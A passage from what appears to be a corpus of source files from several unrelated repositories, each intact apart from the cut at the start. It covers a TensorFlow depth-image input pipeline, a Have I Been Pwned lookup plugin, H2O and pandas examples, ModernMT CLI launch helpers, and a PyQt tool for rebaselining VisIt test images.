:return: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch
"""
with tf.variable_scope(scope, "image_producer"):
# Load index csv file
textReader = tf.TextLineReader()
csv_path = tf.train.string_input_producer([filename], shuffle=True)
_, csv_content = textReader.read(csv_path)
if has_mask and has_abd:
depth_raw_filename, depth_ref_filename, color_filename, mask_filename, albedo_filename = \
tf.decode_csv(csv_content, [[""], [""], [""], [""], [""]])
elif has_mask:
depth_raw_filename, depth_ref_filename, color_filename, mask_filename = \
tf.decode_csv(csv_content, [[""], [""], [""], [""]])
else:
depth_raw_filename, depth_ref_filename, color_filename = \
tf.decode_csv(csv_content, [[""], [""], [""]])
# Read and decode image data to tf.float32 tensor
depth_raw_data = tf.read_file(depth_raw_filename)
depth_ref_data = tf.read_file(depth_ref_filename)
color_data = tf.read_file(color_filename)
depth_raw_im = tf.image.decode_png(depth_raw_data, channels=1, dtype=depth_type)
depth_ref_im = tf.image.decode_png(depth_ref_data, channels=1, dtype=depth_type)
if has_mask:
mask_data = tf.read_file(mask_filename)
mask = tf.image.decode_png(mask_data, channels=1) / 255
mask = tf.cast(mask, tf.float32)
if has_abd:
albedo_data = tf.read_file(albedo_filename)
albedo_im = tf.image.decode_png(albedo_data, channels=1)
albedo_im = tf.cast(albedo_im, tf.float32)
if aux_type == "JPEG":
color_im = tf.image.decode_jpeg(color_data, channels=1)
elif aux_type == "PNG":
color_im = tf.image.decode_png(color_data, channels=1)
else:
raise NotImplementedError("unsupport auxiliary image type for now!")
depth_raw_im = tf.cast(depth_raw_im, tf.float32)
depth_ref_im = tf.cast(depth_ref_im, tf.float32)
color_im = tf.cast(color_im, tf.float32)
# color_im = tf.image.resize_images(color_im, depth_raw_shape[:2], method=2) # return float Tensor
# Concat all images in channel axis to randomly crop together
if has_mask and has_abd:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask, albedo_im], axis=2)
n_concat = 5
elif has_mask:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask], axis=2)
n_concat = 4
else:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im], axis=2)
n_concat = 3
        # Apply rand_crop first to avoid unnecessary computation in the subsequent data augmentations.
if rand_crop:
concated_im = tf.random_crop(concated_im, [output_height, output_width, n_concat])
# concated_im = tf.image.crop_to_bounding_box(concated_im, 80, 250, output_height, output_width) # dbg
else:
concated_im = tf.image.resize_image_with_crop_or_pad(concated_im, output_height, output_width)
if has_mask and has_abd:
depth_raw_im, depth_ref_im, color_im, mask, albedo_im = tf.split(concated_im, n_concat, axis=2)
elif has_mask:
depth_raw_im, depth_ref_im, color_im, mask = tf.split(concated_im, n_concat, axis=2)
else:
depth_raw_im, depth_ref_im, color_im = tf.split(concated_im, 3, axis=2)
# Filter bad inputs use diff_mean or mse
n_holes = tf.count_nonzero(tf.less(depth_ref_im, tf.constant(50.0)), dtype=tf.float32)
diff = tf.abs(tf.subtract(depth_raw_im, depth_ref_im, name='diff'))
diff = tf.where(diff<up_th/10, diff, tf.zeros_like(diff))
diff_mean = tf.reduce_mean(diff, name='diff_mean')
# mse = tf.reduce_mean(tf.square(diff), name='mse')
enqueue_cond = tf.logical_and(tf.less(n_holes, output_height*output_width*2/3), tf.less(diff_mean, diff_th))
        def zero_img():
            # Empty float32 batch so both tf.cond branches share the dtype returned by one_img().
            return tf.zeros([0, output_height, output_width, n_concat], dtype=tf.float32)
def one_img():
# Data augmentation: rand_flip, rand_scale and rand_depth_shift on filtered patches.
raw = tf.clip_by_value(depth_raw_im, low_th, up_th)
ref = tf.clip_by_value(depth_ref_im, low_th, up_th)
if rand_brightness:
color = tf.image.random_brightness(color_im, 20)
else:
color = color_im
if rand_depth_shift:
raw, ref = rand_shift_depth([raw, ref], low_th, up_th)
if has_mask and has_abd:
                im = tf.concat([raw, ref, color, mask, albedo_im], axis=2)
elif has_mask:
im = tf.concat([raw, ref, color, mask], axis=2)
else:
im = tf.concat([raw, ref, color], axis=2)
if rand_flip:
im = tf.image.random_flip_left_right(im)
if rand_scale:
pass
return tf.expand_dims(im, 0)
concated_im = tf.cond(enqueue_cond, one_img, zero_img)
## Pass the 4D batch tensors to a batching op at the end of input data queue
# shuffle_batch creates a shuffling queue with dequeue op and enqueue QueueRunner
# min_after_dequeue defines how big a buffer we will randomly sample from
# bigger means better shuffling but slower start up and more memory used.
# capacity must be larger than min_after_dequeue and the amount larger
# determines the maximum we will prefetch.
# capacity = min_after_dequeue + (num_threads + small_safety_margin) * batch_size
if use_shuffle_batch:
capacity = min_after_dequeue + (num_threads + 1) * batch_size
im_batch = tf.train.shuffle_batch(
[concated_im],
batch_size=batch_size,
capacity=capacity,
enqueue_many=True,
num_threads=num_threads,
min_after_dequeue=min_after_dequeue,
allow_smaller_final_batch=True,
name="shuffle_batch")
else:
im_batch = tf.train.batch(
[concated_im],
batch_size=batch_size,
num_threads=num_threads,
allow_smaller_final_batch=True,
enqueue_many=True,
name="batch")
# Split concatenated data
if has_mask and has_abd:
depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch = tf.split(im_batch, n_concat, axis=3)
elif has_mask:
depth_raw_batch, depth_ref_batch, color_batch, mask_batch = tf.split(im_batch, n_concat, axis=3)
else: # get mask only from ref(after clip, outliers are equal to low_th)
depth_raw_batch, depth_ref_batch, color_batch = tf.split(im_batch, n_concat, axis=3)
mask_batch = tf.cast(tf.not_equal(depth_ref_batch, low_th), tf.float32, name='mask_batch') # 0.0 or 1.0
# Normalize depth and color maps
with tf.name_scope('normalize'):
thres_range = (up_th - low_th) / 2.0
depth_raw_batch = (depth_raw_batch - low_th) / thres_range
depth_raw_batch = tf.subtract(depth_raw_batch, 1.0, name='raw_batch') # [low,up]->[-1,1]
depth_ref_batch = (depth_ref_batch - low_th) / thres_range
depth_ref_batch = tf.subtract(depth_ref_batch, 1.0, name='ref_batch') # [low,up]->[-1,1]
color_batch = color_batch * mask_batch / 127.0
color_batch = tf.subtract(color_batch, 1.0, name='aux_batch') # [0,255]->[-1,1]
if has_abd:
albedo_batch = albedo_batch / 127.0 # offline estimated albedo from RGB, [0,255]->[0,2]
else:
albedo_batch = None
# dbg: return and show last diff_mean in batch
return depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch, diff_mean
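if __name__ == '__main__':
    # Minimal usage sketch. The CSV path below is hypothetical; the index file must
    # follow the column layout documented in read_image_from_filename.
    raw_b, ref_b, color_b, mask_b, abd_b, dbg_diff = read_image_from_filename(
        'train_index.csv', batch_size=16, has_mask=True, has_abd=False)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)
        print(sess.run(dbg_diff))  # mean |raw - ref| of the most recently sampled patch
        coord.request_stop()
        coord.join(threads)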
|
core/plugins/hibp.py | area55git/Gitmails | 140 | 30134 | import time
import requests
from core.utils.parser import Parser
from core.utils.helpers import Helpers
from core.models.plugin import BasePlugin
class HIBP(BasePlugin):
def __init__(self, args):
self.args = args
self.base_url = "https://haveibeenpwned.com/api/v2/breachedaccount"
self.url_parameters = "truncateResponse=true&includeUnverified=true"
def execute(self, data):
Helpers.print_warning("Starting Have I Been Pwned plugin...", jumpline=True)
all_emails = Parser(self.args).all_unique_emails(data)
if all_emails:
self.check_all_emails(all_emails)
return True
return False
def check_authors(self, authors):
for author in authors:
time.sleep(2)
self.check_email(author.email)
def check_all_emails(self, emails):
for email in emails:
time.sleep(2)
self.check_email(email)
def check_email(self, email):
try:
url = "{}/{}?{}".format(self.base_url, email, self.url_parameters)
r = requests.get(url)
if r.status_code == 503:
Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")
elif r.status_code == 429:
Helpers.print_error("hibp: Throttled by HIBP API")
elif r.text:
r = r.json()
print("\n{} leaks:".format(email))
for leak in r:
print("\t- {}".format(leak["Name"]))
return True
return False
except Exception as e:
Helpers.print_error(e)
return False
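# Hypothetical wiring example (the Gitmails framework normally constructs the plugin):
# HIBP(args).check_email("user@example.com") issues a single GET against the v2
# breachedaccount endpoint and prints any breach names found in the JSON reply; args is
# only stored by __init__ and is not used by check_email itself.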
|
ml_metadata/workspace.bzl | zijianjoy/ml-metadata | 458 | 30136 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ML METADATA Data Validation external dependencies that can be loaded in WORKSPACE files.
"""
load("//ml_metadata:mysql_configure.bzl", "mysql_configure")
def ml_metadata_workspace():
"""All ML Metadata external dependencies."""
mysql_configure()
|
h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py | vishalbelsare/h2o-3 | 6,098 | 30188 | <filename>h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py<gh_stars>1000+
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import h2o
import os
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from tests import pyunit_utils
def model_download_with_cv():
prostate = h2o.import_file(pyunit_utils.locate("smalldata/prostate/prostate.csv"))
prostate["CAPSULE"] = prostate["CAPSULE"].asfactor()
prostate_gbm = H2OGradientBoostingEstimator(nfolds=2, keep_cross_validation_predictions=True)
prostate_gbm.train(x=["AGE", "RACE", "PSA", "DCAPS"], y="CAPSULE", training_frame=prostate)
path = pyunit_utils.locate("results")
model_path = h2o.download_model(prostate_gbm, path=path, export_cross_validation_predictions=True)
assert os.path.isfile(model_path), "Expected model artifact {0} to exist, but it does not.".format(model_path)
h2o.remove_all()
prostate_gbm_reloaded = h2o.upload_model(model_path)
assert isinstance(prostate_gbm_reloaded, H2OGradientBoostingEstimator), \
"Expected H2OGradientBoostingEstimator, but got {0}".format(prostate_gbm_reloaded)
holdout_frame_id = prostate_gbm.cross_validation_holdout_predictions().frame_id
assert h2o.get_frame(holdout_frame_id) is not None
if __name__ == "__main__":
pyunit_utils.standalone_test(model_download_with_cv)
else:
model_download_with_cv()
|
notebook/pandas_agg.py | vhn0912/python-snippets | 174 | 30194 | import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
|
cli/mmt/mmtcli.py | Centaurioun/modernmt | 154 | 30206 | <reponame>Centaurioun/modernmt
import os
import re
from cli.mmt import MMT_HOME_DIR, MMT_LIB_DIR, MMT_BIN_DIR, MMT_JAR, MMT_PLUGINS_JARS
from cli.utils import osutils
def __get_java_version():
try:
stdout, stderr = osutils.shell_exec(['java', '-version'])
java_output = stdout + '\n' + stderr
for line in java_output.split('\n'):
tokens = line.split()
if 'version' in tokens:
version = tokens[tokens.index('version') + 1]
version = version.strip('"')
if version.startswith('1.'):
version = version[2:]
version = re.match('^[0-9]+', version)
return int(version.group())
return None
except OSError:
return None
__java_version = __get_java_version()
assert __java_version is not None, 'missing Java executable, please check INSTALL.md'
assert __java_version > 7, 'wrong version of Java: required Java 8 or higher'
def mmt_env():
llp = (MMT_LIB_DIR + os.pathsep + os.environ['LD_LIBRARY_PATH']) if 'LD_LIBRARY_PATH' in os.environ else MMT_LIB_DIR
return dict(os.environ, LD_LIBRARY_PATH=llp, LC_ALL='C.UTF-8', LANG='C.UTF-8')
if 'MMT_HOME' not in os.environ:
os.environ['MMT_HOME'] = MMT_HOME_DIR
# - ModernMT CLI functions ---------------------------------------------------------------------------------------------
def mmt_java(main_class, args=None, *,
java_ops=None, remote_debug=False, max_heap_mb=None, server=False, logs_path=None):
java_ops = java_ops or []
if remote_debug:
java_ops.append('-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005')
if server:
java_ops.append('-server')
if max_heap_mb is not None:
java_ops.append('-Xms' + str(max_heap_mb) + 'm')
java_ops.append('-Xmx' + str(max_heap_mb) + 'm')
if logs_path is not None:
java_ops += ['-XX:ErrorFile=' + os.path.join(logs_path, 'hs_err_pid%p.log')]
java_ops += ['-XX:+PrintGCDateStamps', '-verbose:gc', '-XX:+PrintGCDetails',
'-Xloggc:' + os.path.join(logs_path, 'gc.log')]
java_ops += ['-XX:+HeapDumpOnOutOfMemoryError', '-XX:HeapDumpPath=' + logs_path]
java_ops += ['-XX:+CMSClassUnloadingEnabled', '-XX:+UseConcMarkSweepGC', '-XX:+CMSParallelRemarkEnabled',
'-XX:+UseCMSInitiatingOccupancyOnly', '-XX:CMSInitiatingOccupancyFraction=70',
'-XX:+ScavengeBeforeFullGC', '-XX:+CMSScavengeBeforeRemark', '-XX:+CMSClassUnloadingEnabled',
'-XX:+ExplicitGCInvokesConcurrentAndUnloadsClasses']
else:
if max_heap_mb is not None:
java_ops.append('-Xmx' + str(max_heap_mb) + 'm')
classpath = ':'.join([MMT_JAR] + MMT_PLUGINS_JARS)
java_cmd = ['java'] + java_ops + \
['-cp', classpath, '-Dmmt.home=' + MMT_HOME_DIR, '-Djava.library.path=' + MMT_LIB_DIR, main_class]
if args is not None:
java_cmd += args
return java_cmd
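# Illustrative call: mmt_java('eu.modernmt.cli.CleaningPipelineMain', ['-s', 'en'],
# max_heap_mb=1024) builds roughly
# ['java', '-Xmx1024m', '-cp', '<MMT_JAR>:<plugins>', '-Dmmt.home=<MMT_HOME_DIR>',
#  '-Djava.library.path=<MMT_LIB_DIR>', 'eu.modernmt.cli.CleaningPipelineMain', '-s', 'en'].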
def mmt_tmsclean(src_lang, tgt_lang, in_path, out_path, out_format=None, filters=None):
args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path]
if out_format is not None:
args += ['--output-format', out_format]
if filters is not None and len(filters) > 0:
args += ['--filters'] + filters
extended_heap_mb = int(osutils.mem_size() * 90 / 100)
java_ops = ['-DentityExpansionLimit=0', '-DtotalEntitySizeLimit=0', '-Djdk.xml.totalEntitySizeLimit=0']
command = mmt_java('eu.modernmt.cli.CleaningPipelineMain', args, max_heap_mb=extended_heap_mb, java_ops=java_ops)
osutils.shell_exec(command, env=mmt_env())
def mmt_preprocess(src_lang, tgt_lang, in_paths, out_path, dev_path=None, test_path=None,
partition_size=None, quiet=False):
args = ['-s', src_lang, '-t', tgt_lang, '--output', out_path, '--input']
if isinstance(in_paths, str):
in_paths = [in_paths]
args += in_paths
if partition_size is not None:
args += ['--size', str(partition_size)]
if dev_path is not None:
args += ['--dev', dev_path]
if test_path is not None:
args += ['--test', test_path]
if quiet:
args.append('--quiet')
command = mmt_java('eu.modernmt.cli.TrainingPipelineMain', args)
osutils.shell_exec(command, env=mmt_env())
def mmt_dedup(src_lang, tgt_lang, in_path, out_path, length_threshold=None, sort=None):
args = ['-s', src_lang, '-t', tgt_lang, '--input', in_path, '--output', out_path]
if length_threshold is not None and length_threshold > 0:
        args += ['-l', str(length_threshold)]
if sort is not None:
args += ['--sort'] + sort
command = mmt_java('eu.modernmt.cli.DeduplicationMain', args)
osutils.shell_exec(command, env=mmt_env())
# - Fastalign CLI functions --------------------------------------------------------------------------------------------
def fastalign_build(src_lang, tgt_lang, in_path, out_model, iterations=None,
case_sensitive=True, favor_diagonal=True, log=None):
os.makedirs(out_model, exist_ok=True)
out_model = os.path.join(out_model, '%s__%s.fam' % (src_lang, tgt_lang))
if log is None:
log = osutils.DEVNULL
command = [os.path.join(MMT_BIN_DIR, 'fa_build'), '-s', src_lang, '-t', tgt_lang, '-i', in_path, '-m', out_model]
if iterations is not None:
command.extend(['-I', str(iterations)])
if not case_sensitive:
command.append('--case-insensitive')
if not favor_diagonal:
command.append('--no-favor-diagonal')
osutils.shell_exec(command, stdout=log, stderr=log, env=mmt_env())
def fastalign_score(src_lang, tgt_lang, model_path, in_path, out_path=None):
model_path = os.path.join(model_path, '%s__%s.fam' % (src_lang, tgt_lang))
command = [os.path.join(MMT_BIN_DIR, 'fa_score'), '-s', src_lang, '-t', tgt_lang,
'-m', model_path, '-i', in_path, '-o', out_path or in_path]
stdout, _ = osutils.shell_exec(command, env=mmt_env())
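    # fa_score is expected to print "key=value" lines; only the four aggregate
    # statistics returned below are consumed by callers.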
result = dict()
for line in stdout.splitlines(keepends=False):
key, value = line.split('=', maxsplit=1)
result[key] = float(value)
return result['good_avg'], result['good_std_dev'], result['bad_avg'], result['bad_std_dev']
|
seno/wallet/trading/trade_status.py | emilson0407/seno-blockchain | 11,902 | 30226 | from enum import Enum
class TradeStatus(Enum):
PENDING_ACCEPT = 0
PENDING_CONFIRM = 1
PENDING_CANCEL = 2
CANCELED = 3
CONFIRMED = 4
FAILED = 5
|
src/test/rebaseline-p.py | visit-dav/vis | 226 | 30238 | import filecmp
import os
import sys
import shutil
import subprocess
import time
import unittest
if (sys.version_info > (3, 0)):
import urllib.request, urllib.parse, urllib.error
else:
import urllib
from optparse import OptionParser
from PyQt4 import QtCore,QtGui
parser = OptionParser()
parser.add_option("-r", "--root", dest="web_root",
default="http://portal.nersc.gov/project/visit/",
help="Root of web URL where baselines are")
parser.add_option("-d", "--date", dest="web_date",
help="Date of last good run, in YYMonDD form")
parser.add_option("-m", "--mode", dest="mode",
help="Mode to run in: serial, parallel, sr")
parser.add_option("-w", "--web-url", dest="web_url",
help="Manual URL specification; normally generated "
"automatically based on (-r, -d, -m)")
parser.add_option("-g", "--git", dest="git", action="store_true",
help="Use git to ignore images with local modifications")
parser.add_option("-s", "--svn", dest="svn", action="store_true",
help="Use svn to ignore images with local modifications")
(options, args) = parser.parse_args()
if options.web_url is not None:
uri = options.web_url
else:
uri = options.web_root + options.web_date + "/"
mode = ""
if options.mode == "sr" or options.mode == "scalable,parallel" or \
options.mode == "scalable_parallel":
mode="davinci_scalable_parallel_icet"
else:
mode="".join([ s for s in ("davinci_", options.mode) ])
uri += mode + "/"
parser.destroy()
print("uri:", uri)
class MW(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
def real_dirname(path):
"""Python's os.path.dirname is not dirname."""
return path.rsplit('/', 1)[0]
def real_basename(path):
    """Python's os.path.basename is not basename."""
    if path.rsplit('/', 1)[1] == '': return None
    return path.rsplit('/', 1)[1]
def baseline_current(serial_baseline):
"""Given the path to the serial baseline image, determine if there is a mode
specific baseline. Return a 2-tuple of the baseline image and the path to
the 'current' image."""
dname = real_dirname(serial_baseline)
bname = real_basename(serial_baseline)
baseline = serial_baseline
if options.mode is not None:
# Check for a mode specific baseline.
mode_spec = os.path.join(dname + "/", options.mode + "/", bname)
if os.path.exists(mode_spec):
baseline = mode_spec
# `Current' image never has a mode-specific path; filename/dir is always
# based on the serial baseline's directory.
no_baseline = serial_baseline.split('/', 1) # path without "baseline/"
current = os.path.join("current/", no_baseline[1])
return (baseline, current)
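# Example mapping (paths are illustrative): with --mode parallel,
# baseline/category/test/a.png resolves to baseline/category/test/parallel/a.png when
# that file exists (otherwise the serial baseline), paired with current/category/test/a.png.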
def mode_specific(baseline):
"""Given a baseline image path, return a path to the mode specific baseline,
even if said baseline does not exist (yet)."""
if options.mode is None or options.mode == "serial":
return baseline
dname = real_dirname(baseline)
bname = real_basename(baseline)
if options.mode == "parallel":
if baseline.find("/parallel") != -1:
# It's already got parallel in the path; this IS a mode specific
# baseline.
return baseline
return os.path.join(dname, options.mode, bname)
if options.mode.find("scalable") != -1:
if baseline.find("scalable_parallel") != -1:
# Already is mode-specific.
return baseline
return os.path.join(dname, "scalable_parallel", bname)
# Ruh roh. options.mode must be garbage.
raise NotImplementedError("Unknown mode '%s'" % options.mode)
def local_modifications_git(file):
vcs_diff = subprocess.call(["git", "diff", "--quiet", file])
if vcs_diff == 1:
return True
return False
def local_modifications_svn(file):
svnstat = subprocess.Popen("svn stat %s" % file, shell=True,
stdout=subprocess.PIPE)
diff = svnstat.communicate()[0]
if diff != '':
return True
return False
def local_modifications(filepath):
"""Returns true if the file has local modifications. Always false if the
user did not supply the appropriate VCS option."""
if options.git: return local_modifications_git(filepath)
if options.svn: return local_modifications_svn(filepath)
return False
def equivalent(baseline, image):
"""True if the files are the same."""
if not os.path.exists(image): return False
# Note this is `shallow' by default, but that's fine for our usage.
return filecmp.cmp(baseline, image)
def trivial_pass(baseline, image):
"""True if we can determine that this image is OK without querying the
network."""
return equivalent(baseline, image) or local_modifications(baseline)
class RebaselinePTests(unittest.TestCase):
def test_dirname(self):
input_and_results = [
("baseline/category/test/a.png", "baseline/category/test"),
("b/c/t/q.png", "b/c/t"),
("b/c/t/longfn.png", "b/c/t"),
("b/c/t/", "b/c/t")
]
for tst in input_and_results:
self.assertEqual(real_dirname(tst[0]), tst[1])
def test_basename(self):
input_and_results = [
("baseline/category/test/a.png", "a.png"),
("b/c/t/q.png", "q.png"),
("b/c/t/longfn.png", "longfn.png"),
("b/c/t/", None)
]
for tst in input_and_results:
self.assertEqual(real_basename(tst[0]), tst[1])
class Image(QtGui.QWidget):
def __init__(self, path, parent=None):
self._filename = path
self._parent = parent
self._display = QtGui.QLabel(self._parent)
self._load()
def _load(self):
pixmap = QtGui.QPixmap(300,300)
pixmap.load(self._filename)
self._display.resize(pixmap.size())
self._display.setPixmap(pixmap)
def widget(self): return self._display
def width(self): return self._display.width()
def height(self): return self._display.height()
def update(self, path):
self._filename = path
self._load()
class Layout(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self._mainwin = parent
self._mainwin.statusBar().insertPermanentWidget(0,QtGui.QLabel())
self.status("Initializing...")
quit = QtGui.QPushButton('Quit', self)
quit.setMaximumWidth(80)
if parent is None: parent = self
parent.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,
QtCore.SLOT('quit()'))
parent.connect(self, QtCore.SIGNAL('closeApp()'), self._die)
self._init_signals()
self._bugs = [] # list which keeps track of which images we think are bugs.
# guess an initial size; we don't know a real size until we've downloaded
# images.
self.resize_this_and_mainwin(600, 600)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setFocus()
self._baseline = None
self._current = None
self._diff = None
self._images = [None, None, None]
self._next_set_of_images()
self._images[0] = Image(self._baseline, self)
self._images[1] = Image(self._current, self)
self._images[2] = Image(self._diff, self)
grid = QtGui.QGridLayout()
label_baseline = QtGui.QLabel(grid.widget())
label_current = QtGui.QLabel(grid.widget())
label_diff = QtGui.QLabel(grid.widget())
label_baseline.setText("Baseline image:")
label_current.setText("Davinci's current:")
label_diff.setText("difference between them:")
label_baseline.setMaximumSize(QtCore.QSize(160,35))
label_current.setMaximumSize(QtCore.QSize(160,35))
label_diff.setMaximumSize(QtCore.QSize(200,35))
label_directions = QtGui.QLabel(grid.widget())
label_directions.setText("Keyboard shorcuts:\n\n"
"y: yes, rebaseline\n"
"n: no, current image is wrong\n"
"u: unknown, I can't/don't want to decide now\n"
"q: quit")
label_directions.setMaximumSize(QtCore.QSize(300,300))
grid.addWidget(label_baseline, 0,0)
grid.addWidget(label_current, 0,1)
grid.addWidget(self._images[0].widget(), 1,0)
grid.addWidget(self._images[1].widget(), 1,1)
grid.addWidget(label_diff, 2,0)
grid.addWidget(quit, 2,1)
grid.addWidget(self._images[2].widget(), 3,0)
grid.addWidget(label_directions, 3,1)
rows = (
(0, (label_baseline, label_current)),
(1, (self._images[0], self._images[1])),
(2, (label_diff, quit)),
(3, (self._images[2], label_directions))
)
cols = (
(0, (label_baseline, self._images[0], label_diff, self._images[2])),
(1, (label_current, self._images[1], quit, label_directions))
)
for r in rows:
grid.setRowMinimumHeight(r[0], max([x.height() for x in r[1]]))
for c in cols:
grid.setColumnMinimumWidth(c[0], max([x.height() for x in c[1]]))
self.setLayout(grid)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.show()
self.setFocus()
def resize_this_and_mainwin(self, w, h):
self.resize(w,h)
# make sure it can't shrink too much
self._mainwin.setMinimumWidth(w)
self._mainwin.setMinimumHeight(h+30) # +30: for the status bar
# try not to resize the mainwin if we don't need to; it's annoying.
cur_w = self._mainwin.width()
cur_h = self._mainwin.height()
self._mainwin.resize(max(w,cur_w), max(h,cur_h))
self._mainwin.update()
def _die(self):
print("You thought these test results were bugs:")
for f in self._bugs:
print("\t", f)
self._mainwin.close()
def calc_width(self):
w = 0
for col in range(0,self.layout().columnCount()):
w += self.layout().columnMinimumWidth(col)
return w
def calc_height(self):
h = 0
for row in range(0,self.layout().rowCount()):
h += self.layout().rowMinimumHeight(row)
return h
def _update_images(self):
self._images[0].update(self._baseline)
self._images[1].update(self._current)
self._images[2].update(self._diff)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.update()
def _rebaseline(self):
self.status("".join(["rebaselining ", self._current, "..."]))
baseline = mode_specific(self._baseline)
print("moving", self._current, "on top of", baseline)
# We might be creating the first mode specific baseline for that test. If
# so, it'll be missing the baseline specific dir.
if not os.path.exists(real_dirname(baseline)):
print(real_dirname(baseline), "does not exist, creating...")
os.mkdir(real_dirname(baseline))
shutil.move(self._current, baseline) # do the rebaseline!
self._next_set_of_images()
self._update_images()
def _ignore(self):
self.status("".join(["ignoring ", self._baseline, "..."]))
self._bugs.append(self._baseline)
self._next_set_of_images()
self._update_images()
def _unknown(self):
self.status("".join(["unknown ", self._baseline, "..."]))
self._next_set_of_images()
self._update_images()
def status(self, msg):
self._mainwin.statusBar().showMessage(msg)
self._mainwin.statusBar().update()
QtCore.QCoreApplication.processEvents() # we're single threaded
